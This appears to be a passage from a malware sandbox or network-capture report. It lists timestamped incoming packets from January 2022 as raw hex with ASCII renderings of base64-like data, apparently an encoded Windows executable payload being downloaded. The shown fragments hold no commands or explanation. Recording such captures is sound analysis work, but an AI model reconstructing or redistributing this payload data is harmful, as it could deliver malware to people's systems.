2022-01-30 12:30:36 UTC	152	IN	Data Raw: 77 78 30 41 4c 41 41 41 41 0d 0a 62 54 4a 79 79 69 58 43 33 45 65 2f 30 5a 55 43 41 49 74 56 38 49 4e 43 42 4d 64 4b 2f 41 45 41 62 56 6a 34 42 48 43 37 45 71 62 63 44 78 53 4a 54 65 53 4c 56 52 71 4a 56 65 43 45 52 66 43 4c 0d 0a 4a 56 7a 77 67 48 69 37 47 71 4c 63 46 2b 79 4a 56 64 79 4c 52 65 4a 51 69 30 33 72 55 59 74 56 6a 51 72 34 42 4c 52 69 33 41 4f 6e 79 52 46 53 36 41 64 31 41 41 71 4c 52 66 43 45 53 41 53 4a 0d 0a 49 49 44 34 46 4c 43 37 41 70 72 63 42 39 53 4a 52 64 43 4c 54 64 71 4a 54 63 79 43 56 51 79 4a 4f 4a 44 34 42 4b 53 35 47 6f 62 63 55 34 6b 51 69 30 58 77 69 30 49 45 67 38 45 4c 69 55 33 45 0d 0a 35 67 32 33 79 44 33 79 33 41 75 58 79 30 57 38 69 30 32 38 69 55 65 34 6a 56 55 44 69 56 57 30 35 68 33 4c 79 69 57 47 33 46 2f 65 55 6f Data Ascii: wx0ALAAAAbTJyyiXC3Ee/0ZUCAItV8INCBMdK/AEAbVj4BHC7EqbcDxSJTeSLVRqJVeCERfCLJVzwgHi7GqLcF+yJVdyLReJQi03rUYtVjQr4BLRi3AOnyRFS6Ad1AAqLRfCESASJIID4FLC7AprcB9SJRdCLTdqJTcyCVQyJOJD4BKS5GobcU4kQi0Xwi0IEg8ELiU3E5g23yD3y3AuXy0W8i028iUe4jVUDiVW05h3LyiWG3F/eUo
2022-01-30 12:30:36 UTC	168	IN	Data Raw: 35 64 61 56 30 6c 52 55 6d 53 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 50 4e 6d 66 34 57 67 79 56 78 30 42 46 59 6c 6c 38 49 6c 4e 36 49 46 46 36 49 6c 4b 70 49 74 4e 0d 0a 79 64 45 2b 37 65 4e 6e 76 38 63 43 68 6f 74 46 78 49 6c 46 32 49 46 4e 78 49 50 4f 42 49 6c 4e 75 64 4d 6d 6d 65 4e 33 58 32 56 56 67 2f 67 45 69 55 58 67 69 30 66 55 69 31 58 58 69 77 45 72 0d 0a 62 35 6d 4c 52 65 46 33 34 38 55 61 71 6f 6c 4e 6f 49 74 56 6f 49 4f 56 56 50 2f 77 2f 38 64 46 72 61 65 4d 76 6d 66 31 45 74 4b 6f 76 66 39 2f 69 30 57 63 69 55 2b 38 69 30 33 50 4f 30 32 38 0d 0a 48 6c 44 2b 46 4b 69 37 41 76 61 38 52 49 31 46 76 49 6c 46 75 49 46 4e 75 49 6c 43 6d 49 74 56 39 64 45 6d 31 65 4e 33 77 38 56 66 79 30 32 51 69 31 57 30 4f 31 2b 51 64 51 58 6e 6a 32 Data Ascii: 5daV0lRUmShAAAAAFpkiSUPAAAAPNmf4WgyVx0BFYll8IlN6IFF6IlKpItNydE+7eNnv8cChotFxIlF2IFNxIPOBIlNudMmmeN3X2VVg/gEiUXgi0fUi1XXiwErb5mLReF348UaqolNoItVoIOVVP/w/8dFraeMvmf1EtKovf9/i0WciU+8i03PO028HlD+FKi7Ava8RI1FvIlFuIFNuIlCmItV9dEm1eN3w8Vfy02Qi1W0O1+QdQXnj2
2022-01-30 12:30:36 UTC	184	IN	Data Raw: 31 2b 67 55 75 69 33 78 41 4d 41 37 70 78 2f 79 69 33 61 56 41 74 48 51 55 55 59 69 55 57 63 69 30 66 63 4b 30 30 66 67 38 45 42 0d 0a 50 4e 4d 6d 39 57 74 6e 52 78 7a 63 42 35 78 51 36 49 2f 45 41 77 71 44 78 41 79 45 54 65 79 4a 49 4d 44 34 46 50 43 37 41 74 72 63 42 35 53 4a 52 5a 43 4e 54 64 71 4a 54 59 79 45 56 5a 43 4c 0d 0a 4b 4e 54 34 53 65 45 34 33 41 75 7a 79 55 33 30 5a 49 6b 4e 41 41 6f 41 41 49 76 71 58 63 49 55 62 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 71 2f 32 67 67 42 51 77 51 5a 4b 45 50 41 41 41 41 0d 0a 50 54 7a 36 5a 47 67 79 56 30 37 55 72 6d 53 4a 54 65 53 4c 52 65 36 4a 52 65 79 45 54 65 79 4c 50 45 6a 36 46 4c 53 35 47 71 71 2f 65 53 30 44 41 43 74 46 33 44 46 46 43 48 4d 4b 36 50 34 79 0d 0a 62 31 6a 34 42 4c 51 78 45 6b 62 65 Data Ascii: 1+gUui3xAMA7px/yi3aVAtHQUUYiUWci0fcK00fg8EBPNMm9WtnRxzcB5xQ6I/EAwqDxAyETeyJIMD4FPC7AtrcB5SJRZCNTdqJTYyEVZCLKNT4SeE43AuzyU30ZIkNAAoAAIvqXcIUbZS/jaT+m4ICyexq/2ggBQwQZKEPAAAAPTz6ZGgyV07UrmSJTeSLRe6JReyETeyLPEj6FLS5Gqq/eS0DACtF3DFFCHMK6P4yb1j4BLQxEkbe
2022-01-30 12:30:36 UTC	200	IN	Data Raw: 69 33 4b 33 45 52 73 43 67 68 30 46 49 74 56 43 49 4e 56 38 49 74 4b 38 46 43 4c 0d 0a 49 4b 53 62 2b 50 66 4e 71 4b 56 4d 79 55 30 49 69 55 33 73 69 31 2f 73 55 6f 74 4b 39 49 73 49 50 4e 4d 2b 76 59 43 4e 2f 62 47 6f 79 30 58 6f 69 2b 56 64 77 67 34 41 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 72 79 55 58 38 69 55 58 34 69 30 66 34 67 38 45 4c 69 55 33 30 35 67 32 48 79 69 33 4b 33 45 52 73 43 67 68 30 46 49 74 56 43 49 4e 56 38 49 74 4b 38 46 43 4c 0d 0a 49 4b 53 62 6d 50 66 4e 71 4b 56 4d 79 55 30 49 69 55 33 73 69 31 2f 73 55 6f 74 4b 39 49 73 49 50 4e 4d 2b 76 59 44 4e 2b 37 47 6f 79 30 58 6f 69 2b 56 64 77 67 34 41 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 72 79 55 58 38 69 55 58 34 69 30 66 34 67 38 45 4c Data Ascii: i3K3ERsCgh0FItVCINV8ItK8FCLIKSb+PfNqKVMyU0IiU3si1/sUotK9IsIPNM+vYCN/bGoy0Xoi+Vdwg4AzMzDzMzMONOfwoQq3gOryUX8iUX4i0f4g8ELiU305g2Hyi3K3ERsCgh0FItVCINV8ItK8FCLIKSbmPfNqKVMyU0IiU3si1/sUotK9IsIPNM+vYDN+7Goy0Xoi+Vdwg4AzMzDzMzMONOfwoQq3gOryUX8iUX4i0f4g8EL
2022-01-30 12:30:36 UTC	216	IN	Data Raw: 6b 65 6f 69 45 33 71 44 37 5a 56 0d 0a 69 4e 32 68 54 75 77 6b 56 6b 35 58 7a 30 58 4d 69 59 55 63 2f 2f 58 2f 69 30 33 2f 67 38 45 45 35 4e 56 58 76 70 66 4e 37 55 70 58 51 67 42 72 77 76 2b 4c 6a 53 37 2f 2f 2f 38 4d 51 51 53 4a 0d 0a 36 48 69 4d 76 70 65 35 77 6d 36 6f 76 66 2b 4c 41 6f 74 49 43 49 4f 4e 46 50 2f 77 2f 34 75 56 63 61 65 4d 76 75 47 6e 54 37 47 6f 76 59 75 46 47 50 2f 2f 2f 31 71 4c 6a 52 54 77 2f 2f 2f 6f 0d 0a 41 59 75 4d 76 71 35 33 73 30 2f 63 44 2f 43 44 77 51 53 4a 6a 52 72 2f 2f 2f 2b 31 42 41 41 41 62 54 4f 78 76 75 4f 2f 52 37 47 6f 76 51 4e 42 42 49 6d 46 44 50 58 2f 2f 34 75 61 44 50 2f 2f 0d 0a 6b 74 4e 78 79 69 41 36 33 73 4f 4c 76 50 2f 2f 69 35 58 63 2f 76 58 2f 69 5a 55 4c 2f 2f 2f 2f 31 55 68 7a 51 57 68 5a 6e 37 48 63 Data Ascii: keoiE3qD7ZViN2hTuwkVk5Xz0XMiYUc//X/i03/g8EE5NVXvpfN7UpXQgBrwv+LjS7///8MQQSJ6HiMvpe5wm6ovf+LAotICIONFP/w/4uVcaeMvuGnT7GovYuFGP///1qLjRTw///oAYuMvq53s0/cD/CDwQSJjRr///+1BAAAbTOxvuO/R7GovQNBBImFDPX//4uaDP//ktNxyiA63sOLvP//i5Xc/vX/iZUL////1UhzQWhZn7Hc
2022-01-30 12:30:36 UTC	232	IN	Data Raw: 36 5a 47 67 79 56 30 37 55 72 69 6a 48 52 65 41 41 41 41 6f 41 61 68 54 6e 33 52 45 44 62 64 75 33 52 65 46 33 75 34 6b 53 76 67 41 41 41 41 43 44 66 65 59 41 64 42 65 45 52 51 79 4a 0d 0a 4b 49 54 34 44 4c 52 6a 33 41 4f 37 71 6e 49 55 2f 2f 2b 4a 52 65 4c 72 42 38 64 4b 36 41 41 41 62 56 6a 34 46 49 43 37 41 70 61 51 42 2f 7a 2f 2f 2f 2f 2f 69 30 2f 59 69 55 58 72 78 30 58 4d 0d 0a 62 56 68 7a 51 61 39 33 68 30 35 58 51 67 43 4c 54 65 53 44 77 51 61 4a 54 64 53 45 56 64 53 4a 4f 4a 54 34 42 49 79 37 45 70 37 63 44 77 6a 48 41 51 41 41 41 41 71 4c 56 51 6a 49 51 67 51 41 0d 0a 62 56 68 7a 7a 43 33 2b 33 67 75 6e 79 55 30 49 69 31 58 77 69 77 69 4a 41 59 74 43 43 49 74 56 6e 64 4d 78 52 65 46 7a 55 38 55 61 73 73 63 42 41 41 41 41 41 49 46 56 38 4d 64 4e Data Ascii: 6ZGgyV07UrijHReAAAAoAahTn3REDbdu3ReF3u4kSvgAAAACDfeYAdBeERQyJKIT4DLRj3AO7qnIU//+JReLrB8dK6AAAbVj4FIC7ApaQB/z/////i0/YiUXrx0XMbVhzQa93h05XQgCLTeSDwQaJTdSEVdSJOJT4BIy7Ep7cDwjHAQAAAAqLVQjIQgQAbVhzzC3+3gunyU0Ii1XwiwiJAYtCCItVndMxReFzU8UasscBAAAAAIFV8MdN
2022-01-30 12:30:36 UTC	248	IN	Data Raw: 46 39 41 6f 41 41 41 41 41 74 6b 58 30 36 4a 67 48 59 5a 6f 39 52 77 74 48 54 56 63 46 6f 49 49 47 45 50 67 50 45 55 55 66 69 30 30 49 0d 0a 71 31 6c 65 79 6a 30 36 31 49 78 57 79 31 55 49 38 67 38 51 52 52 70 6d 44 79 34 4b 65 49 49 47 66 63 65 46 68 53 78 49 59 73 55 53 53 73 59 41 4d 49 74 4e 43 49 6e 42 41 59 6c 43 43 49 74 56 0d 0a 5a 5a 35 78 62 2b 4e 33 58 38 32 58 51 34 6c 46 43 49 74 4e 43 4d 77 42 4d 49 74 61 43 49 50 43 62 4e 45 6d 53 65 4e 33 58 36 65 6a 51 67 41 41 69 30 55 4d 4b 30 38 49 67 2f 67 65 66 52 64 6f 0d 0a 7a 32 31 7a 51 51 43 61 4d 6b 68 48 4b 74 42 39 42 68 44 6f 46 36 67 44 41 49 50 4c 44 4d 64 46 6b 56 68 7a 51 57 6a 31 45 72 35 58 51 67 41 41 67 2b 77 49 38 67 55 51 52 52 44 39 44 78 45 45 0d 0a 53 64 55 6d 73 54 71 2f 45 72 Data Ascii: F9AoAAAAAtkX06JgHYZo9RwtHTVcFoIIGEPgPEUUfi00Iq1leyj061IxWy1UI8g8QRRpmDy4KeIIGfceFhSxIYsUSSsYAMItNCInBAYlCCItVZZ5xb+N3X82XQ4lFCItNCMwBMItaCIPCbNEmSeN3X6ejQgAAi0UMK08Ig/gefRdoz21zQQCaMkhHKtB9BhDoF6gDAIPLDMdFkVhzQWj1Er5XQgAAg+wI8gUQRRD9DxEESdUmsTq/Er
2022-01-30 12:30:36 UTC	264	IN	Data Raw: 32 76 61 38 79 34 38 78 52 55 6a 50 4a 69 31 58 38 67 38 67 45 69 51 71 47 53 67 53 4c 0d 0a 4b 4b 54 77 67 57 78 69 33 41 4e 66 77 63 45 45 55 65 68 74 78 77 67 41 67 38 51 48 69 31 58 38 71 6c 71 6e 4a 57 34 69 33 41 75 72 79 55 30 49 69 31 45 4d 69 56 6f 4d 69 30 58 7a 67 38 41 51 0d 0a 35 42 32 4c 79 69 58 4b 6b 45 2f 6a 77 41 59 51 4d 39 4b 4c 52 66 4b 44 77 41 53 47 45 49 6c 51 61 64 4d 2b 75 65 76 7a 55 78 2f 63 46 77 69 44 77 68 52 53 36 43 6e 48 41 67 43 4d 78 41 69 4c 0d 0a 4b 4b 43 30 51 55 53 78 55 56 37 63 42 2f 79 4c 35 56 33 43 42 41 72 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 78 77 43 37 67 67 59 51 0d 0a 58 70 48 34 46 4a 53 78 6c 55 72 65 53 49 6c 4b 42 49 74 46 2f 49 6e 41 42 46 Data Ascii: 2va8y48xRUjPJi1X8g8gEiQqGSgSLKKTwgWxi3ANfwcEEUehtxwgAg8QHi1X8qlqnJW4i3AuryU0Ii1EMiVoMi0Xzg8AQ5B2LyiXKkE/jwAYQM9KLRfKDwASGEIlQadM+uevzUx/cFwiDwhRS6CnHAgCMxAiLKKC0QUSxUV7cB/yL5V3CBArMzMzDzMzMoZS/jaT+m4ICyexRiU38i0/8xwC7ggYQXpH4FJSxlUreSIlKBItF/InABF
2022-01-30 12:30:36 UTC	280	IN	Data Raw: 47 52 65 2b 39 78 6b 58 70 43 73 5a 46 0d 0a 69 70 61 31 42 49 41 35 6b 51 75 2b 4e 73 5a 46 36 74 2f 47 52 65 47 75 78 6b 58 6a 4e 4d 5a 46 67 4d 75 31 42 49 5a 5a 39 75 72 2f 52 52 43 44 34 41 45 50 68 59 49 41 41 41 43 45 44 61 53 6f 0d 0a 61 6b 6a 77 69 47 6d 37 57 75 72 2f 52 52 44 47 42 61 4f 6f 42 78 6f 42 44 31 66 50 5a 67 38 54 4b 4b 69 59 55 2b 4e 6e 70 38 32 56 51 34 74 46 39 49 50 51 41 49 4e 56 38 49 6c 4b 39 49 4e 39 0d 0a 6d 56 67 45 41 68 6f 30 31 44 4f 6e 54 58 4d 37 61 67 42 71 41 59 46 4e 39 46 47 45 56 66 42 53 68 57 76 36 51 32 69 35 70 2f 5a 57 51 67 41 41 61 38 67 41 6a 58 59 4e 34 47 6f 50 61 67 47 4c 0d 0a 4f 4b 77 68 79 69 33 43 42 36 5a 44 79 77 49 41 69 67 77 33 69 49 4b 55 71 41 63 66 36 36 56 6f 48 58 5a 31 55 59 44 55 33 30 Data Ascii: GRe+9xkXpCsZFipa1BIA5kQu+NsZF6t/GReGuxkXjNMZFgMu1BIZZ9ur/RRCD4AEPhYIAAACEDaSoakjwiGm7Wur/RRDGBaOoBxoBD1fPZg8TKKiYU+Nnp82VQ4tF9IPQAINV8IlK9IN9mVgEAho01DOnTXM7agBqAYFN9FGEVfBShWv6Q2i5p/ZWQgAAa8gAjXYN4GoPagGLOKwhyi3CB6ZDywIAigw3iIKUqAcf66VoHXZ1UYDU30
2022-01-30 12:30:36 UTC	296	IN	Data Raw: 4c 51 6a 71 55 42 70 56 55 37 64 54 6a 65 49 69 4a 43 6d 42 78 72 72 70 57 6a 50 50 51 59 51 68 61 49 70 51 32 69 78 6b 30 72 76 30 71 59 48 45 46 39 65 69 2b 39 64 77 38 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 52 79 41 52 6e 65 44 2f 7a 48 52 66 67 76 41 41 6f 41 78 6b 58 50 43 63 5a 46 72 42 69 31 42 4b 6f 44 6b 51 75 55 50 63 5a 46 78 4c 4c 47 52 63 38 5a 78 6b 58 4a 45 73 5a 46 0d 0a 71 6b 4f 31 42 4b 41 4e 6b 51 75 65 47 38 5a 46 79 6a 50 47 52 63 45 78 78 6b 58 44 73 73 5a 46 6f 45 47 31 42 4b 5a 6e 6b 51 75 59 46 4d 5a 46 30 44 37 47 52 64 74 59 78 6b 58 64 4d 4d 5a 46 0d 0a 76 6a 75 31 42 4c 79 51 6b 51 75 43 46 63 5a 46 31 6c 62 47 52 64 30 49 78 6b 58 58 65 38 5a 46 74 45 57 31 42 4c 49 70 6b 51 75 4d 50 38 5a 46 33 4c 66 47 52 64 63 2b 78 6b Data Ascii: LQjqUBpVU7dTjeIiJCmBxrrpWjPPQYQhaIpQ2ixk0rv0qYHEF9ei+9dw8zDzMzMONOfwoRyARneD/zHRfgvAAoAxkXPCcZFrBi1BKoDkQuUPcZFxLLGRc8ZxkXJEsZFqkO1BKANkQueG8ZFyjPGRcExxkXDssZFoEG1BKZnkQuYFMZF0D7GRdtYxkXdMMZFvju1BLyQkQuCFcZF1lbGRd0IxkXXe8ZFtEW1BLIpkQuMP8ZF3LfGRdc+xk
2022-01-30 12:30:36 UTC	312	IN	Data Raw: 6e 50 47 52 65 6e 6b 78 6b 58 72 79 4d 5a 46 69 4b 69 31 42 49 36 4f 6b 51 75 77 74 38 5a 46 36 4a 50 47 52 65 50 75 78 6b 58 6c 63 63 5a 46 0d 0a 68 76 4f 31 42 49 54 2b 6b 51 75 36 75 4d 5a 46 37 72 6a 47 52 65 57 62 6f 65 69 51 42 78 43 44 6a 56 6c 38 78 4f 41 79 56 30 37 63 54 2b 69 66 42 78 43 44 79 51 75 4a 44 65 69 51 42 78 44 47 0d 0a 61 4c 7a 73 52 6e 67 7a 57 42 6d 58 4a 41 38 54 52 66 44 72 45 6f 46 56 38 49 50 4e 41 59 74 46 6d 64 75 6a 51 65 46 6e 70 38 63 53 74 6f 4e 39 39 41 42 33 51 33 67 47 67 33 33 2f 45 48 4d 37 0d 0a 42 31 67 5a 51 4f 4e 2f 6f 78 2f 63 46 2f 42 53 36 41 38 73 41 67 71 4c 38 4c 67 4f 41 41 41 41 42 70 42 7a 7a 42 51 2f 74 79 52 58 4b 41 47 4c 56 66 52 53 69 30 2f 77 55 4f 6a 2f 4b 77 49 41 0d 0a 35 31 52 45 79 65 44 6d Data Ascii: nPGRenkxkXryMZFiKi1BI6OkQuwt8ZF6JPGRePuxkXlccZFhvO1BIT+kQu6uMZF7rjGReWboeiQBxCDjVl8xOAyV07cT+ifBxCDyQuJDeiQBxDGaLzsRngzWBmXJA8TRfDrEoFV8IPNAYtFmdujQeFnp8cStoN99AB3Q3gGg33/EHM7B1gZQON/ox/cF/BS6A8sAgqL8LgOAAAABpBzzBQ/tyRXKAGLVfRSi0/wUOj/KwIA51REyeDm
2022-01-30 12:30:36 UTC	328	IN	Data Raw: 78 7a 34 46 4a 52 67 76 35 32 74 51 77 43 44 78 41 69 4c 52 66 61 4c 35 56 33 4e 42 41 44 4d 0d 0a 4f 4e 4f 66 4b 35 64 61 39 30 6c 52 55 6d 53 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 2f 79 43 58 65 33 41 75 37 77 65 68 6f 69 55 58 6f 69 30 66 6f 67 38 46 6e 36 4b 35 55 0d 0a 6b 71 66 34 44 49 43 78 6c 69 62 65 44 2f 43 4c 56 66 44 48 41 6c 70 6c 42 68 44 49 52 66 77 41 62 56 68 7a 79 69 33 43 6b 45 34 58 4a 67 59 51 69 30 33 77 55 65 4b 51 39 51 45 50 67 38 51 45 0d 0a 71 68 32 50 76 70 66 4e 71 4d 55 43 53 6f 50 69 41 58 51 55 61 4c 6f 41 41 41 43 45 52 65 79 44 68 54 41 6a 71 53 37 49 56 6b 37 55 68 67 69 4c 52 65 79 44 36 47 4b 4c 54 66 52 72 69 51 30 41 0d 0a 62 56 68 7a 79 6f 31 76 6c 55 70 58 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c Data Ascii: xz4FJRgv52tQwCDxAiLRfaL5V3NBADMONOfK5da90lRUmShAAAAAFpkiSUPAAAA7rR/yCXe3Au7wehoiUXoi0fog8Fn6K5Ukqf4DICxlibeD/CLVfDHAlplBhDIRfwAbVhzyi3CkE4XJgYQi03wUeKQ9QEPg8QEqh2PvpfNqMUCSoPiAXQUaLoAAACEReyDhTAjqS7IVk7UhgiLReyD6GKLTfRriQ0AbVhzyo1vlUpXjszMzMzMzF+L
2022-01-30 12:30:36 UTC	344	IN	Data Raw: 51 45 41 69 59 2f 30 2b 66 2f 77 6a 59 31 49 0d 0a 6d 4b 65 4d 71 63 41 58 71 4c 48 63 56 79 43 66 42 78 42 53 6f 54 61 66 42 78 42 66 6a 55 33 6b 68 56 75 51 76 4a 64 69 76 35 4f 49 76 2f 38 50 74 73 69 46 79 51 57 45 6c 77 49 50 41 49 50 73 0d 0a 64 64 4f 6e 79 4d 33 43 72 72 47 6f 45 4b 48 4d 6e 67 63 51 55 49 64 4e 35 4f 6a 58 34 76 33 2f 35 70 43 62 45 49 7a 50 71 4b 5a 62 55 67 41 41 69 45 58 4e 69 6b 66 4e 69 45 33 44 44 37 5a 56 0d 0a 6f 64 32 68 54 75 77 44 56 6b 35 58 4b 41 43 44 37 42 69 4c 78 49 4f 6c 37 50 6e 77 2f 31 43 4c 59 44 7a 73 52 6e 68 6a 32 67 4f 7a 71 70 72 69 2f 66 2b 4c 79 4f 49 54 35 50 33 77 69 59 58 6f 0d 0a 6c 4b 65 4d 68 79 33 4f 49 38 32 37 57 6f 76 4d 69 61 58 6b 2b 66 58 2f 6a 56 57 72 55 75 69 31 6d 71 61 4d 79 4f 33 53 Data Ascii: QEAiY/0+f/wjY1ImKeMqcAXqLHcVyCfBxBSoTafBxBfjU3khVuQvJdiv5OIv/8PtsiFyQWElwIPAIPsddOnyM3CrrGoEKHMngcQUIdN5OjX4v3/5pCbEIzPqKZbUgAAiEXNikfNiE3DD7ZVod2hTuwDVk5XKACD7BiLxIOl7Pnw/1CLYDzsRnhj2gOzqpri/f+LyOIT5P3wiYXolKeMhy3OI827WovMiaXk+fX/jVWrUui1mqaMyO3S
2022-01-30 12:30:36 UTC	360	IN	Data Raw: 0a 71 56 7a 36 42 4c 44 30 45 72 4a 56 7a 34 30 59 2f 76 2f 2f 36 47 59 41 2f 2f 2b 43 68 65 54 39 6b 71 63 6a 79 69 58 71 33 46 2f 63 44 39 69 4c 51 68 54 2f 30 49 46 4e 33 49 50 47 42 49 6c 4e 0d 0a 73 5a 34 32 76 57 79 35 41 70 62 63 51 49 74 4e 32 49 74 51 45 50 58 53 69 45 58 6b 69 30 58 49 56 68 31 58 54 75 79 39 56 30 35 58 79 55 33 59 69 78 47 4c 54 64 4b 4c 51 67 7a 77 30 49 68 46 0d 0a 67 4e 58 2b 61 5a 62 4e 71 4d 63 61 2f 6f 74 56 76 49 6d 56 58 50 58 2f 2f 34 74 4b 76 49 4e 34 65 55 67 42 54 61 2b 33 4e 37 47 6f 76 51 45 41 41 41 44 72 43 73 32 46 59 50 2f 77 2f 77 41 41 0d 0a 62 56 6a 35 7a 41 6a 4e 71 4c 48 66 44 2b 34 50 74 6c 58 75 68 64 68 30 46 34 74 4b 76 49 73 49 35 4e 57 48 76 35 66 4e 33 4e 75 6a 76 50 2f 2f 69 5a 56 63 2f 2f 58 2f Data Ascii: qVz6BLD0ErJVz40Y/v//6GYA//+CheT9kqcjyiXq3F/cD9iLQhT/0IFN3IPGBIlNsZ42vWy5ApbcQItN2ItQEPXSiEXki0XIVh1XTuy9V05XyU3YixGLTdKLQgzw0IhFgNX+aZbNqMca/otVvImVXPX//4tKvIN4eUgBTa+3N7GovQEAAADrCs2FYP/w/wAAbVj5zAjNqLHfD+4PtlXuhdh0F4tKvIsI5NWHv5fN3NujvP//iZVc//X/
2022-01-30 12:30:36 UTC	376	IN	Data Raw: 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 50 79 43 58 61 33 41 75 2f 79 30 58 73 69 30 33 73 69 55 66 77 69 31 58 6a 67 38 49 45 0d 0a 35 41 32 76 79 69 33 65 31 49 35 66 79 30 58 59 69 30 33 77 67 7a 4d 41 44 34 53 52 41 41 41 41 35 67 32 76 79 6d 71 37 45 6f 72 63 44 2f 43 4c 45 59 6c 56 77 49 46 46 36 49 6c 4b 31 49 74 4e 0d 0a 75 64 45 2b 2f 65 4e 6e 76 38 63 43 6b 6f 74 46 30 49 6c 46 75 49 46 4e 32 49 74 61 38 49 73 42 52 6c 71 79 75 57 71 37 45 6f 4c 63 44 2f 43 4c 45 59 6c 56 79 49 46 46 7a 4d 48 76 41 6f 6c 46 0d 0a 69 64 4d 2b 69 65 46 2f 74 34 6b 53 76 67 41 41 41 41 43 42 66 65 34 41 45 41 41 50 63 67 32 4e 4f 4c 77 68 7a 43 33 53 42 36 59 62 2b 50 2f 2f 69 30 33 6b 55 59 46 56 34 46 4c 6e 68 57 34 42 0d 0a 62 64 75 33 53 61 Data Ascii: hAAAAAFpkiSUPAAAA7rRPyCXa3Au/y0Xsi03siUfwi1Xjg8IE5A2vyi3e1I5fy0XYi03wgzMAD4SRAAAA5g2vymq7EorcD/CLEYlVwIFF6IlK1ItNudE+/eNnv8cCkotF0IlFuIFN2Ita8IsBRlqyuWq7EoLcD/CLEYlVyIFFzMHvAolFidM+ieF/t4kSvgAAAACBfe4AEAAPcg2NOLwhzC3SB6Yb+P//i03kUYFV4FLnhW4Bbdu3Sa
2022-01-30 12:30:36 UTC	392	IN	Data Raw: 6f 6a 67 75 30 45 41 49 79 50 55 54 63 46 2f 78 53 36 41 66 6e 2f 2f 57 4c 52 66 7a 4a 51 41 6f 41 0d 0a 35 72 30 75 67 71 54 2b 6d 34 4b 62 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c 37 46 47 47 54 66 79 4c 4b 4b 52 38 39 79 41 6a 30 6f 63 6a 58 47 69 56 79 7a 63 68 61 4a 39 44 59 2f 39 6c 41 47 6f 52 0d 0a 35 67 32 50 45 34 44 31 73 62 47 6f 79 55 58 38 78 6b 41 52 41 49 48 6c 58 63 50 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 44 37 5a 48 45 59 58 4a 0d 0a 47 55 59 62 68 4d 30 4e 64 69 5a 43 6c 5a 73 46 61 67 42 71 45 59 46 56 2f 46 4c 6e 68 2b 62 2f 6b 74 4d 32 76 61 35 79 52 6b 37 63 70 31 33 44 7a 4d 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 45 4f 46 2f 71 38 55 53 76 67 2b 32 53 42 4b 46 79 58 Data Ascii: ojgu0EAIyPUTcF/xS6Afn//WLRfzJQAoA5r0ugqT+m4KbjszMzMzMzF+L7FGGTfyLKKR89yAj0ocjXGiVyzchaJ9DY/9lAGoR5g2PE4D1sbGoyUX8xkARAIHlXcPDzMzMoZS/jaT+m4ICyexRiU38i0/8D7ZHEYXJGUYbhM0NdiZClZsFagBqEYFV/FLnh+b/ktM2va5yRk7cp13DzMzMzMbMzMzDzMzMONOfEOF/q8USvg+2SBKFyX
2022-01-30 12:30:36 UTC	408	IN	Data Raw: 6c 41 41 41 41 41 4c 4b 34 4a 41 41 50 36 4c 34 57 0d 0a 62 46 69 30 42 4a 51 79 56 30 35 58 7a 30 55 49 69 55 58 67 69 30 66 67 69 55 33 58 69 31 58 67 37 69 4a 6e 55 52 6f 37 6b 41 75 4c 51 77 41 41 41 4f 73 48 78 30 2f 63 41 41 41 50 41 49 70 46 0d 0a 73 64 41 32 73 6d 65 45 47 72 33 53 69 33 51 4f 69 31 58 67 69 77 69 4a 52 62 69 45 54 62 69 4a 49 49 44 34 46 4c 43 37 41 76 72 63 42 37 53 4a 52 62 42 71 52 47 41 41 6a 59 31 44 2f 2f 2f 2f 0d 0a 50 4c 43 5a 35 70 66 4e 50 56 34 39 51 6f 31 56 6b 46 4c 6f 33 61 33 2f 2f 7a 50 50 69 45 58 79 34 42 57 42 71 53 69 58 71 62 48 65 42 39 53 4c 54 64 54 6f 78 64 4c 2f 2f 32 67 50 49 41 41 41 0d 0a 34 4e 56 50 6d 70 66 4e 42 73 55 43 6c 6c 4a 71 41 47 67 6f 63 41 77 51 36 48 6e 78 2f 66 2f 2f 76 57 75 7a 79 53 Data Ascii: lAAAAALK4JAAP6L4WbFi0BJQyV05Xz0UIiUXgi0fgiU3Xi1Xg7iJnURo7kAuLQwAAAOsHx0/cAAAPAIpFsdA2smeEGr3Si3QOi1XgiwiJRbiETbiJIID4FLC7AvrcB7SJRbBqRGAAjY1D////PLCZ5pfNPV49Qo1VkFLo3a3//zPPiEXy4BWBqSiXqbHeB9SLTdToxdL//2gPIAAA4NVPmpfNBsUCllJqAGgocAwQ6Hnx/f//vWuzyS
2022-01-30 12:30:36 UTC	424	IN	Data Raw: 4e 0d 0a 6d 54 7a 36 54 47 67 79 56 30 37 63 70 31 33 43 43 41 42 6d 6b 46 45 75 41 78 43 35 4c 67 4d 51 65 6e 64 77 55 52 41 64 56 46 36 4f 62 51 4d 51 4f 6a 41 44 45 4a 45 77 41 78 44 7a 4d 41 4d 51 0d 0a 62 56 6c 78 52 6d 73 32 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 32 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 0d 0a 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 73 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 6e 77 65 77 49 33 55 55 49 33 52 59 6b 36 4e 6b 6e 41 51 43 44 71 56 44 72 78 4b 68 4e 58 6f 6b 53 74 67 45 41 41 41 